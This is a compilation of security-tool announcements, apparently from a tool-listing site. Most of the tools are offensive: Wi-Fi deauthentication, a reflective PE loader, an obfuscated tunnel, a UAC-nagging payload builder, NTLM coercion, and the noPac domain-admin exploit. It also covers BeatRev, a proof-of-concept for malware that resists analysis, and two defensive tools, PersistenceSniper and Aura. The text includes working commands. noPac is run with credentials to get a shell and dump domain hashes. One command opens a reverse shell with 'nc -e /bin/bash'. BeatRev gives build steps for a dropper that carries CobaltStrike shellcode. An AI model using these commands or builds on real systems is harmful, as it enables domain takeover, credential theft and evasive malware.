[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop command when the module is running:

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.



PersistenceSniper - Powershell Script That Can Be Used By Blue Teams, Incident Responders And System Administrators To Hunt Persistences Implanted In Windows Machines


PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery.


The Why

Why writing such a tool, you might ask. Well, for starters, I tried looking around and I did not find a tool which suited my particular use case, which was looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command line equivalent, I did not find it a good fit for me. Plus, some of the techniques I implemented so far in PersistenceSniper have not been implemented into Autoruns yet, as far as I know. Anyway, if what you need is an easy to use, GUI based tool with lots of already implemented features, Autoruns is the way to go, otherwise let PersistenceSniper have a shot, it won't miss it :)

Usage

Using PersistenceSniper is as simple as:

PS C:\> git clone https://github.com/last-byte/PersistenceSniper
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence

If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:

Get-Help -Name Find-AllPersistence -Full

PersistenceSniper's Find-AllPersistence returns an array of objects of type PSCustomObject with the following properties:

This allows for easy output formatting and filtering. Let's say you only want to see the persistences that will allow the attacker to regain access as NT AUTHORITY\SYSTEM (aka System):
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"


Of course, being PersistenceSniper a Powershell-based tool, some cool tricks can be performed, like passing its output to Out-GridView in order to have a GUI-based table to interact with.


Interpreting results

As already introduced, Find-AllPersistence outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:

  • ComputerName: this is fairly straightforward. If you run Find-AllPersistence without a -ComputerName parameter, PersistenceSniper will run only on the local machine. Otherwise it will run on the remote computer(s) you specify;
  • Technique: this is the name of the technique itself, as it's commonly known in the community;
  • Classification: this property can be used to quickly identify techniques based on their MITRE ATT&CK technique and subtechnique number. For those techniques which don't have a MITRE ATT&CK classification, other classifications are used, the most common being Hexacorn's one since a lot of techniques were discovered by him. When a technique's source cannot be reliably identified, the "Uncatalogued Technique N.#" classification is used;
  • Path: this is the path, on the filesystem or in the registry, at which the technique has been implanted;
  • Value: this is the value of the registry property the techniques uses, or the name of the executable/library used, in case it's a technique which relies on planting something on the filesystem;
  • Access Gained: this is the kind of access the technique grants the attacker. If it's a Run key under HKCU for example, the access gained will be at a user level, while if it's under HKLM it will be at system level;
  • Note: this is a quick explanation of the technique, so that its workings can be easily grasped;
  • Reference: this is a link to a more in-depth explanation of the technique, should the analyst need to study it more.

Dealing with false positives

Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legimately used, many indeed are by legit software which needs to autorun on system boot or user login.

This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:

  • Not having to manage a whitelist of persistences which can be tedious and error-prone;
  • Tailoring the false positives to the organizations, and their organizational units, which use the tool;
  • Making it harder for attackers who want to blend in false positives by not publicly disclosing them in the tool's code.

Find-AllPersistence comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diffing the results.

PS C:\> Find-AllPersistence -DiffCSV false_positives.csv

 

Looking for persistences by taking incremental snapshots

One cool way to use PersistenceSniper my mate Riccardo suggested is to use it in an incremental way: you could setup a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV parameter and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot within a reasonably small time frame new persistences implanted on the machine you are monitoring.

Persistence techniques implemented so far

The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:

Credits

The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:

I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.

License

This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.



Nim-RunPE - A Nim Implementation Of Reflective PE-Loading From Memory


A Nim implementation of reflective PE-Loading from memory. The base for this code was taken from RunPE-In-Memory - which I ported to Nim.

You'll need to install the following dependencies:

nimble install ptr_math winim

I did test this with Nim Version 1.6.2 only, so use that version for testing or I cannot guarantee no errors when using another version.


Compile

If you want to pass arguments on runtime or don't want to pass arguments at all compile via:

nim c NimRunPE.nim

If you want to hardcode custom arguments modify const exeArgs to your needs and compile with:

nim c -d:args NimRunPE.nim - this was contributed by @glynx, thanks!

😎

More Information

The technique itself it pretty old, but I didn't find a Nim implementation yet. So this has changed now. :)



If you plan to load e.g. Mimikatz with this technique - make sure to compile a version from source on your own, as the release binaries don't accept arguments after being loaded reflectively by this loader. Why? I really don't know it's strange but a fact. If you compile on your own it will still work:


 

My private Packer is also weaponized with this technique - but all Win32 functions are replaced with Syscalls there. That makes the technique stealthier.



GraphCrawler - GraphQL Automated Security Testing Toolkit


Graph Crawler is the most powerful automated testing toolkit for any GraphQL endpoint.

NEW: Can search for endpoints for you using Escape Technology's powerful Graphinder tool. Just point it towards a domain and add the '-e' option and Graphinder will do subdomain enumeration + search popular directories for GraphQL endpoints. After all this GraphCrawler will take over and work through each find.

It will run through and check if mutation is enabled, check for any sensitive queries available, such as users and files, and it will also test any easy queries it find to see if authentication is required.

If introspection is not enabled on the endpoint it will check if it is an Apollo Server and then can run Clairvoyance to brute force and grab the suggestions to try to build the schema ourselves. (See the Clairvoyance project for greater details on this). It will then score the findings 1-10 with 10 being the most critical.

If you want to dig deeper into the schema you can also use graphql-path-enum to look for paths to certain types, like user IDs, emails, etc.

I hope this saves you as much time as it has for me


Usage

python graphCrawler.py -u https://test.com/graphql/api -o <fileName> -a "<headers>"


██████╗ ██████╗ █████╗ ██████╗ ██╗ ██╗ ██████╗██████╗ █████╗ ██╗ ██╗██╗ ███████╗██████╗
██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██║ ██║██╔════╝██╔══██╗██╔══██╗██║ ██║██║ ██╔════╝██╔══██╗
██║ ███╗██████╔╝███████║██████╔╝███████║██║ ██████╔╝███████║██║ █╗ ██║██║ █████╗ ██████╔╝
██║ ██║██╔══██╗██╔══██║██╔═══╝ ██╔══██║██║ ██╔══██╗██╔══██║██║███╗██║██║ ██╔══╝ ██╔══██╗
╚██████╔╝██║ ██║██║ ██║██║ ██║ ██║╚██████╗██║ ██║██║ ██║╚███╔███╔╝███████╗███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝

The output option is not required and by default it will output to schema.json

Example output:

Requirements

  • Python3
  • Docker
  • Install all Python dependencies with pip

Wordlist from google-10000-english

TODO

  • Add option for "full report" following the endpoint search where it will run clairvoyance and all other aspects of the toolkit on the endpoints found
  • Default to "simple scan" to just find endpoints when this feature is added
  • Way Future: help craft queries based of the shema provided


Gohide - Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption


Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.

Obfuscation Modes

  • Session Cookie HTTP GET (http-client)
  • Set-Cookie Session Cookie HTTP/2 200 OK (http-server)
  • WebSocket Handshake "Sec-WebSocket-Key" (websocket-client)
  • WebSocket Handshake "Sec-WebSocket-Accept" (websocket-server)
  • No obfuscation, just use AES-GCM encrypted messages (none)

AES-GCM is enabled by default for each of the options above.


Usage

root@WOPR-KALI:/opt/gohide-dev# ./gohide -h
Usage of ./gohide:
-f string
listen fake server -r x.x.x.x:xxxx (ip/domain:port) (default "0.0.0.0:8081")
-key openssl passwd -1 -salt ok | md5sum
aes encryption secret: use '-k openssl passwd -1 -salt ok | md5sum' to derive key from password (default "5fe10ae58c5ad02a6113305f4e702d07")
-l string
listen port forward -l x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:8080")
-m string
obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default "none")
-pem string
path to .pem for TLS encryption mode: default = use hardcoded key pair 'CN:target.com', none = plaintext mode (default "default")
-r string
forward to remote fake server -r x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:9999")

Scenario

Box A - Reverse Handler.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
Local Port Forward Listening: 127.0.0.1:8080
FakeSrv Listening: 0.0.0.0:8081

Box B - Target.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
Local Port Forward Listening: 127.0.0.1:9090
FakeSrv Listening: 0.0.0.0:9091

Note: /etc/hosts "127.0.0.1 target.com"

Box B - Netcat /bin/bash

root@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090

Box A - Netcat client

root@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080
localhost [127.0.0.1] 8080 (http-alt) open
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
netstat -pantwu
Active Internet connections (servers and established)
tcp 0 0 127.0.0.1:39684 127.0.0.1:8081 ESTABLISHED 14334/./gohide

Obfuscation Samples

websocket-client (Box A to Box B)

  • Sec-WebSocket-Key contains AES-GCM encrypted content e.g. "uname -a".
GET /news/api/latest HTTP/1.1
Host: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13

websocket-server (Box B to Box A)

  • Sec-WebSocket-Accept contains AES-GCM encrypted output.
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=

http-client

  • Session cookie header contains AES-GCM encrypted content
GET /news/api/latest HTTP/1.1
Host: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://www.bbc.co.uk/
Connection: keep-alive
Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly

http-server

  • Set-Cookie header contains AES-GCM encrypted content.
HTTP/2.0 200 OK
content-encoding: gzip
content-type: text/html; charset=utf-8
pragma: no-cache
server: nginx
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, must-revalidate
expires: Thu, 21 Nov 2019 01:07:15 GMT
date: Thu, 21 Nov 2019 01:07:15 GMT
content-length: 30330
vary: Accept-Encoding
X-Firefox-Spdy: h2
Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly

none

8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA

 


 

Future

  • Fix up error handling.

Enjoy~



ForceAdmin - Create Infinite UAC Prompts Forcing A User To Run As Admin


ForceAdmin is a c# payload builder, creating infinate UAC pop-ups until the user allows the program to be ran. The inputted commands are ran via powershell calling cmd.exe and should be using the batch syntax. Why use? Well some users have UAC set to always show, so UAC bypass techniques are not possible. However - this attack will force them to run as admin. Bypassing these settings.


Screenshots


Required

For building on your own, the following NuGet packages are needed

  • Fody: "Extensible tool for weaving .net assemblies."
  • Costura.Fody "Fody add-in for embedding references as resources."
  • Microsoft.AspNet.WebApi.Client "This package adds support for formatting and content negotiation to System.Net.Http. It includes support for JSON, XML, and form URL encoded data."

Installation

You can download the latest tarball by clicking here or latest zipball by clicking here.

Download the project:

$ git clone https://github.com/catzsec/ForceAdmin.git

Enter the project folder

$ cd ForceAdmin

Run ForceAdmin:

$ dotnet run

Compile ForceAdmin:

$ dotnet publish -r win-x64 -c Release -o ./publish/

⚠ONLY USE FOR EDUCATIONAL PURPOSES⚠

Any questions, errors or solutions, create an Issue in the Issues tab.



Coercer - A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine Through 9 Methods


A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.

Features

  • Automatically detects open SMB pipes on the remote machine.
  • Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
  • Analyze mode with --analyze, which only lists the vulnerable protocols and functions listening, without performing a coerced authentication.
  • Perform coerce attack on a list of targets from a file with --targets-file
  • Coerce to a WebDAV target with --webdav-host and --webdav-port

Usage

$ ./Coercer.py -h                                                                                                  

______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v1.6
\____/\____/\___/_/ \___/\___/_/ by @podalirius_

usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]
(-t TARGET | -f TARGETS_FILE) [--target-ip ip address]

Automatic windows authentication coercer over various RPC calls.

options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to authenticate to the endpoint.
-p PASSWORD, --password PASSWORD
Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)
-d DOMAIN, --domain DOMAIN
Windows domain name to authenticate to the endpoint.
--hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
--no-pass Don't ask for password (useful for -k)
-v, --verbose Verbose mode (default: False)
-a, --analyze Analyze mode (default: Attack mode)
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
--dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-t TARGET, --target TARGET
IP address or hostname of the target machine
-f TARGETS_FILE, --targets-file TARGETS_FILE
IP address or hostname of the target machine
--target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it

-l LISTENER, --listener LISTENER
IP address or hostname of the listener machine
-wh WEBDAV_HOST, --webdav-host WEBDAV_HOST
WebDAV IP of the server to authenticate to.
-wp WEBDAV_PORT, --webdav-port WEBDAV_PORT
WebDAV port of the server to authenticate to.

Example output

In attack mode (without --analyze option) you get the following output:


After all the RPC calls, you get plenty of authentications in Responder:


Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

Credits



noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User


Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Changed from sam-the-admin.


Usage

SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain

positional arguments:
[domain/]username[:password]
Account used to authenticate to DC.

optional arguments:
-h, --help show this help message and exit
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Domain NetBIOS name. Required if the DC has multiple domains.
-target-name NEWNAME Target computer name, if not specified, will be random generated.
-new-pass PASSWORD Add new computer password, if not specified, will be random generated.
-old-pass PASSWORD Target computer password, use if you know the password of the target you input with -target-name.
-ol d-hash LMHASH:NTHASH
Target computer hashes, use if you know the hash of the target you input with -target-name.
-debug Turn DEBUG output ON
-ts Adds timestamp to every logging output
-shell Drop a shell via smbexec
-no-add Forcibly change the password of the target computer.
-create-child Current account have permission to CreateChild.
-dump Dump Hashs via secretsdump
-use-ldap Use LDAP instead of LDAPS

authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
-dc-ip ip IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used

execute options:
-port [destination port]
Destination port to connect to SMB Server
-mode {SERVER,SHARE} mode to use (default SHARE, SERVER needs root!)< br/> -share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding used (codec) from the target's output (default "GBK").
-service-name service_name
The name of theservice used to trigger the payload

dump options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-use r-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
-resumefile RESUMEFILE
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
-use-vss Use the VSS method insead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec

Note: If -host-name is not specified, the tool will automatically get the domain control hostname, please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a doamin admin to exploit. Use ldaps by default, if you get ssl error, try add -use-ldap .

GetST

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

 

Auto get shell

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator 

 

Dump hash

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt


Scanner

python scanner.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203


MAQ = 0

Method 1

Find the computer that can be modified by the current user.

AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;domain\user  -recmute

 

Exp: add -no-add and target with -target-name.

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -no-add -target-name DomainWin7$ -old-hash :2a99c4a3bd5d30fc94f22bf7403ceb1a -shell


 Warning!! Do not modify the password of the computer in the domain through ldaps or samr, it may break the trust relationship between the computer and the primary domain !!

Method 2

Find CreateChild account, and use the account to exploit.

AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;computer; -recmute

Exp: add -create-child

python noPac.py cgdomain.com/venus:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -create-child


Aura - Python Source Code Auditing And Static Analysis On A Large Scale

Source code auditing and static code analysis

Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.

Project goals:

  • provide an automated monitoring system over uploaded packages to PyPI, alert on anomalies that can either indicate an ongoing attack or vulnerabilities in the code
  • enable an organization to conduct automated security audits of the source code and implement secure coding practices with a focus on auditing 3rd party code such as python package dependencies
  • allow researches to scan code repositories on a large scale, create datasets and perform analysis to further advance research in the area of vulnerable and malicious code dependencies

Feature list:

  • Suitable for analyzing malware with a guarantee of a zero-code execution
  • Advanced deobfuscation mechanisms by rewriting the AST tree - constant propagations, code unrolling, and other dirty tricks
  • Recursive scanning automatically unpacks archives such as zips, wheels, etc.. and scans the content
  • Support scanning also non-python files - plugins can work in a “raw-file” mode such as the built-in Yara integration
  • Scan for hardcoded secrets, passwords, and other sensitive information
  • Custom diff engine - you can compare changes between different data sources such as typosquatting PyPI packages to what changes were made
  • Works for both Python 2.x and Python 3.x source code
  • High performance, designed to scan the whole PyPI repository
  • Output in numerous formats such as pretty plain text, JSON, SQLite, SARIF, etc…
  • Tested on over 4TB of compressed python source code
  • Aura is able to report on code behavior such as network communication, file access, or system command execution
  • Compute the “Aura score” telling you how trustworthy the source code/input data is
  • and much much more…

Didn't find what you are looking for? Aura's architecture is based on a robust plugin system, where you can customize almost anything, ranging from a set of data analyzers, transport protocols to custom out formats.


Installation

# Via pip:
pip install aura-security[full]
# or build from source/git
poetry install --no-dev -E full

Or just use a prebuild docker image sourcecodeai/aura:dev

Running Aura

docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v

Aura uses a so-called URIs to identify the protocol and location to scan, if no protocol is used, the scan argument is treated as a path to the file or directory on a local system.

Diff packages:

docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2

Find most popular typosquatted packages (you need to call aura update to download the dataset first):

aura find-typosquatting --max-distance 2 --limit 10
Python source code auditing and static analysis on a large scale (10)

Why Aura?

While there are other tools with functionality that overlaps with Aura such as Bandit, dlint, semgrep etc. the focus of these alternatives is different which impacts the functionality and how they are being used. These alternatives are mainly intended to be used in a similar way to linters, integrated into IDEs, frequently run during the development which makes it important to minimize false positives and reporting with clear actionable explanations in ideal cases.

Aura on the other hand reports on ** behavior of the code**, anomalies, and vulnerabilities with as much information as possible at the cost of false positive. There are a lot of things reported by aura that are not necessarily actionable by a user but they tell you a lot about the behavior of the code such as doing network communication, accessing sensitive files, or using mechanisms associated with obfuscation indicating a possible malicious code. By collecting this kind of data and aggregating it together, Aura can be compared in functionality to other security systems such as antivirus, IDS, or firewalls that are essentially doing the same analysis but on a different kind of data (network communication, running processes, etc).

Here is a quick overview of differences between Aura and other similar linters and SAST tools:

  • input data:
    • Other SAST tools - usually restricted to only python (target) source code and python version under which the tool is installed.
    • Aura can analyze both binary (or non-python code) and python source code as well. Able to analyze a mixture of python code compatible with different python versions (py2k & py3k) using the same Aura installation.
  • reporting:
    • Other SAST tools - Aims at integrating well with other systems such as IDEs, CI systems with actionable results while trying to minimize false positives to prevent overwhelming users with too many non-significant alerts.
    • Aura - reports as much information as possible that is not immediately actionable such as behavioral and anomaly analysis. The output format is designed for easy machine processing and aggregation rather than human readable.
  • configuration:
    • Other SAST tools - The tools are fine-tuned to the target project by customizing the signatures to target specific technologies used by the target project. The overriding configuration is often possible by inserting comments inside the source code such as # nosec that will suppress the alert at that position
    • Aura - it is expected that there is little to no knowledge in advance about the technologies used by code that is being scanned such as auditing a new python package for approval to be used as a dependency in a project. In most cases, it is not even possible to modify the scanned source code such as using comments to indicate to linter or aura to skip detection at that location because it is scanning a copy of that code that is hosted at some remote location.

Authors & Contributors

Donate

LICENSE

Aura framework is licensed under the GPL-3.0. Datasets produced from global scans using Aura are released under the CC BY-NC 4.0 license. Use the following citation when using Aura or data produced by Aura in research:

@misc{Carnogursky2019thesis,
AUTHOR = "CARNOGURSKY, Martin",
TITLE = "Attacks on package managers [online]",
YEAR = "2019 [cit. 2020-11-02]",
TYPE = "Bachelor Thesis",
SCHOOL = "Masaryk University, Faculty of Informatics, Brno",
SUPERVISOR = "Vit Bukac",
URL = "Available at WWW <https://is.muni.cz/th/y41ft/>",
}


BeatRev - POC For Frustrating/Defeating Malware Analysts


BeatRev Version 2

Disclaimer/Liability

The work that follows is a POC to enable malware to "key" itself to a particular victim in order to frustrate efforts of malware analysts.

I assume no responsibility for malicious use of any ideas or code contained within this project. I provide this research to further educate infosec professionals and provide additional training/food for thought for Malware Analysts, Reverse Engineers, and Blue Teamers at large.


TLDR

The first time the malware runs on a victim it AES encrypts the actual payload(an RDLL) using environmental data from that victim. Each subsequent time the malware is ran it gathers that same environmental info, AES decrypts the payload stored as a byte array within the malware, and runs it. If it fails to decrypt/the payload fails to run, the malware deletes itself. Protection against reverse engineers and malware analysts.



Updated 6 JUNE 2022



I didn't feel finished with this project so I went back and did a fairly substantial re-write. The original research and tradecraft may be found Here.

Major changes are as follows:

  1. I have released all source code
  2. I integrated Stephen Fewer's ReflectiveDLL into the project to replace Stage2
  3. I formatted some of the byte arrays in this project into string format and parse them with UuidFromStringA. This Repo was used as a template. This was done to lower entropy of Stage0 and Stage1
  4. Stage0 has had a fair bit of AV evasion built into it. Thanks to Cerbersec's Project Ares for inspiration
  5. The builder application to produce Stage0 has been included

There are quite a few different things that could be taken from the source code of this project for use elsewhere. Hopefully it will be useful for someone.

Problems with Original Release and Mitigations

There were a few shortcomings with the original release of BeatRev that I decided to try and address.

Stage2 was previously a standalone executable that was stored as the alternate data stream(ADS) of Stage1. In order to acheive the AES encryption-by-victim and subsequent decryption and execution, each time Stage1 was ran it would read the ADS, decrypt it, write back to the ADS, call CreateProcess, and then re-encrypt Stage2 and write it back to disk in the ADS. This was a lot of I/O operations and the CreateProcess call of course wasn't great.

I happened to come upon Steven Fewer's research concerning Reflective DLL's and it seemed like a good fit. Stage2 is now an RDLL; our malware/shellcode runner/whatever we want to protect can be ported to RDLL format and stored as a byte array within Stage1 that is then decrypted on runtime and executed by Stage1. This removes all of the I/O operations and the CreateProcess call from Version1 and is a welcome change.

Stage1 did not have any real kind of AV evasion measures programmed in; this was intentional, as it is extra work and wasn't really the point of this research. During the re-write I took it as an added challenge and added API-hashing to remove functions from the Import Address Table of Stage1. This has helped with detection and Stage1 has a 4/66 detection rate on VirusTotal. I was comfortable uploading Stage1 given that is is already keyed to the original box it was ran on and the file signature constantly changes because of the AES encryption that happens.

I recently started paying attention to entropy as a means to detect malware; to try and lower the otherwise very high entropy that a giant AES encrypted binary blob gives an executable I looked into integrating shellcode stored as UUID's. Because the binary is stored in string representation, there is lower overall entropy in the executable. Using this technique The entropy of Stage0 is now ~6.8 and Stage1 ~4.5 (on a max scale of 8).

Finally it is a giant chore to integrate and produce a complete Stage0 due to all of the pieces that must be manipulated. To make this easier I made a builder application that will ingest a Stage0.c template file, a Stage1 stub, a Stage2 stub, and a raw shellcode file (this was build around Stage2 being a shellcode runner containing CobaltStrike shellcode) and produce a compiled Stage0 payload for use on target.

Technical Details

The Reflective DLL code from Stephen Fewer contains some Visual Studio compiler-specific instructions; I'm sure it is possible to port the technique over to MingW but I do not have the skills to do so. The main problem here is that the CobaltStrike shellcode (stageless is ~265K) needs to go inside the RDLL and be compiled. To get around this and integrate it nicely with the rest of the process I wrote my Stage2 RDLL to contain a global variable chunk of memory that is the size of the CS shellcode; this ~265K chunk of memory has a small placeholder in it that can be located in the compiled binary. The code in src/Stage2 has this added already.

Once compiled, this Stage2stub is transfered to kali where a binary patch may be performed to stick the real CS shellcode into the place in memory that it belongs. This produces the complete Stage2.

To avoid the I/O and CreateProcess fiasco previously described, the complete Stage2 must also be patched into the compiled Stage1 by Stage0; this is necessary in order to allow Stage2 to be encrypted once on-target in addition to preventing Stage2 from being stored separately on disk. The same concept previously described for Stage2 is conducted by Stage0 on target in order to assemble the final Stage1 payload. It should be noted that the memmem function is used in order to locate the placeholder within each stub; this function is no available on Windows, so a custom implementation was used. Thanks to Foxik384 for his code.

In order to perform a binary patch, we must allocate the required memory up front; this has a compounding effect, as Stage1 must now be big enough to also contain Stage2. With the added step of converting Stage2 to a UUID string, Stage2 balloons in size as does Stage1 in order to hold it. A stage2 RDLL with a compiled size of ~290K results in a Stage0 payload of ~1.38M, and a Stage1 payload of ~700K.

The builder application only supports creating x64 EXE's. However with a little more work in theory you could make Stage0 a DLL, as well as Stage1, and have the whole lifecycle exist as a DLL hijack instead of a standalone executable.

Instructions

These instructions will get you on your way to using this POC.

  1. Compile Builder using gcc -o builder src/Builder/BeatRevV2Builder.c
  2. Modify sc_length variable in src/Stage2/dll/src/ReflectiveDLL.c to match the length of raw shellcode file used with builder ( I have included fakesc.bin for example)
  3. Compile Stage2 (in visual studio, ReflectiveDLL project uses some VS compiler-specific instructions)
  4. Move compiled stage2stub.dll back to kali, modify src/Stage1/newstage1.c and define stage2size as the size of stage2stub
  5. Compile stage1stub using x86_64-w64-mingw32-gcc newstage1.c -o stage1stub.exe -s -DUNICODE -Os -L /usr/x86_64-w64-mingw32/lib -l:librpcrt4.a
  6. Run builder using syntax: ./builder src/Stage0/newstage0_exe.c x64 stage1stub.exe stage2stub.dll shellcode.bin
  7. Builder will produce dropper.exe. This is a formatted and compiled Stage0 payload for use on target.

BeatRev Original Release

Introduction

